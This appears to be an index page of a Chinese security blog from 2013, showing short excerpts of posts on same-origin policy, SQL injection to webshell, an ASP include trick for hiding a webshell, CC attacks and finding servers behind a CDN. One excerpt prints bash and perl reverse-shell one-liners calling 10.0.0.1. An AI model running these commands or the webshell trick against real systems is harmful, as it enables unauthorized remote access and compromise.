admin 12年前 (2013-07-22) 4839浏览 0评论

0x00 背景 在Browser Security-同源策略、伪URL的域这篇文章中提到了浏览器的同源策略，其中提到了XMLHttpRequest严格遵守同源策略，非同源不可请求。但是，在实践当中，经常会出现需要跨域请求资源的情况，比较典型的例如...

admin 12年前 (2013-07-22) 1556浏览 0评论

同源策略 同源策略的文档模型 同源策略（Same Origin policy，SOP），也称为单源策略（Single Origin policy），它是一种用于Web浏览器编程语言（如JavaScript和Ajax）的安全措施，以保护信息的保密性...

admin 12年前 (2013-07-22) 1681浏览 0评论

应群里朋友要求做的法客渗透游戏过关攻略视频，其实每一步大家认真研究一下都是能过的。 视频做完才发现法客论坛的客我写错了，不好意思，大家不要介意哦。。法客论坛我没有邀请码，不常去，唉。 第1关 1、http://game.f4ck.net/level1...

admin 12年前 (2013-07-22) 2140浏览 1评论

题目：证明基于ORDER BY的SQL 注入，且单引号（’）被过滤。 已知：代码如下，有注入无悬念。 <php $sortColumn = mysqli_real_escape_string($_GET[‘sort_column&#...

admin 12年前 (2013-07-22) 1769浏览 0评论

1. 异常包 TCP/UDP：端口值为0的包；校验和错误的包 TCP标志位异常包：SYN只能单独存在或只能和ACK共存，和其他标志共存就是异常包；没有标志或标志全置的包；有ACK标志但 Acknowledgment Number为0的包；有SYN标...

admin 12年前 (2013-07-22) 1554浏览 0评论

1、写此文的原因 最近出现的“棱镜”事件，加上之前密码泄漏事件，这大大的增加了我们在互联 网上的安全问题，尤其对我们来说重要的一些账户和密码，如果一旦泄漏出去，那么对我们造成的损失会很大，很严重。网络上也有因为密码泄露而引发的连带的问 题。我们需...

admin 12年前 (2013-07-21) 3832浏览 2评论

这篇文章谈论简单的技术，利用sql注入(SQLi)漏洞，并获得一个webshell，所有的演示都是用DVWA（渗透测试演练系统）.对于SQL注入利用，有以下几个基本步骤: 1,发现SQL注入点; 2,通过mysql数据库帮助，进一步进行注入，获取帐号...

admin 12年前 (2013-07-19) 1832浏览 0评论

将大马写到一个txt文件里面，命名为dama.txt 再建一个文本文档，asp的就写入： <!–#include file=”dama.txt”–>保存为x.asp 两个文件传同目录下，...

admin 12年前 (2013-07-19) 1447浏览 0评论

安全研究人员Dan Melamed近日发现了一个Facebook平台的严重漏洞，可以允许攻击者完全控制任何账号。 这个漏洞之所以被认为严重是因为它允许黑客悄悄的黑掉任何Facebook账户。Dan Melamed在他的博客中发表了这个漏洞，他指出黑客...

admin 12年前 (2013-07-18) 1705浏览 0评论

国内多家知名网站泄露用户密码的事件早已经耳熟能详了，但大家每天还是得继续跟各种网站打交道，为了以后账户密码不怕被一锅端，很多人都宁愿针对不同网站设置多个不同的密码(或使用花密等工具)，这样虽然安全了，但也带来了记忆上很大的负担。   对于...

admin 12年前 (2013-07-18) 1640浏览 0评论

一、列表去重（转换为集合） python 列表本身没有去重的功能，但是我们建议借助别的类型来完成去重的功能，比如集合。 a = [1,2,3,3,2,4] b = set() a = list(set(a)) print a 思路先用set先转换成集...

admin 12年前 (2013-07-17) 1760浏览 0评论

bash版本： bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 ，注意某些linux不支持 perl版本: perl -e 'use Socket;$i="10.0.0.1";$p=1234;...

admin 12年前 (2013-07-17) 1868浏览 0评论

发布日期：2011-12-08 09:00:00 浏览次数：2982 文章作者：Nuclear’Atk 网友评论：12 评论 最后修改：2012-12-04 12:40:0 关于：基于js的CC攻击实现与防御、以及图片方式的DDOS、CC...

admin 12年前 (2013-07-17) 2612浏览 3评论

2013.05.21 No Comments 前言：作者是个懒人，又犯了五月病，什么都懒得做，编辑了好几次文章，后来都不了了之了 但是时间紧迫，下个月就要跨省去外地了，看见大家好像对狗狗很有热情，所以就一口气把一篇笔记发出来了 本来没有那么长的，...

admin 12年前 (2013-07-17) 1484浏览 1评论

1、 什么是WebApp Pentesting WebApp Pentesting，由PentesterLab出品。官方给自己的定义是一个简单又十分有效学习渗透测试的演练平台。它提供诸多的漏洞系统以供网络安全发烧友进行测试和让黑阔们更加深刻地且透彻理...

admin 12年前 (2013-07-16) 1861浏览 0评论

关于如何查找“CDN”真实IP地址的方法 现在很多网站用了cdn技术，在做一些测试的时候，想获取其服务器真实IP地址就有点困难，不知道现在还有其他什么好的方法呢，整理了下，目前知道如下两种： 1：拿CDN服务器 找出真实IP cache_peer 1...

admin 12年前 (2013-07-16) 1647浏览 1评论

起因是这个帖子：大宝贝们的货已经发出，近期注意查收。 帖子中有@疯狗 给乌云礼品拍的一张照片。 然后细心的@HuGtion 通过这张照片的EXIF信息获取到了疯狗在拍这张照片时的经纬度信息（部分马赛克，用星号代替）： 39;*0;86.*00000...

admin 12年前 (2013-07-16) 1198浏览 0评论

顾客信息对于零售业者来说意义非凡，尤其在如今的科技允许商家大量收集并分析顾客个人信息的情况下。像亚马逊这样的线上零售者可以通过 cookies 轻松收集浏览者的数据，从消费习惯、购买时间到购买周期，还有各种售后信息收集。如果把整个消费者群体比成一座...

admin 12年前 (2013-07-16) 1126浏览 0评论

2011年02月18日12:36 腾讯科技讯（Eloise）北京时间2月17日消息，据国 外媒体报道，问答服务网站如今正获得广泛关注，部分原因得归功于崭露头角的硅谷新星问答网站Quora。Quora估值达到了3亿美元，已经成为许多技术 达人常去之处。...

admin 12年前 (2013-07-16) 1787浏览 1评论

上周四，Google宣布从WebKit 分支出自己的浏览器渲染引擎 Blink。很多人觉得这像是晴天霹雳，或者甚至是迟到的愚人节笑话，但是其实这件事情是难以避免的，而且是历史的重演。 什么是WebKit？它到底是谁的？ WebKit 是一个开源的浏...